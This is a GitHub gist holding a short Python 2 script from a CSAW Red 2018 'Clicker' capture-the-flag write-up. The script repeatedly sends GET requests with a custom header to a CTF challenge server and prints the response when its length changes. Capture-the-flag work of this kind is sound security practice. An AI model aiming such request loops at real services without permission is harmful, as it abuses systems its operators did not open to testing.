Created
September 30, 2018 20:36
-
-
Save Ge0rg3/10bb9779655e1e12795fadc72e49ef6c to your computer and use it in GitHub Desktop.
Written for my CSAW Red 2018 Clicker Write-up
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests as rq | |
for i in range(1,1000): | |
headers = { | |
"bring_back_random_click":"hhhhhhhhhh", | |
} | |
req = rq.get("http://web.chal.csaw.io:10106/default/", headers=headers) | |
if len(req.text) != 243: | |
print req.text[:-1] | |
break |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment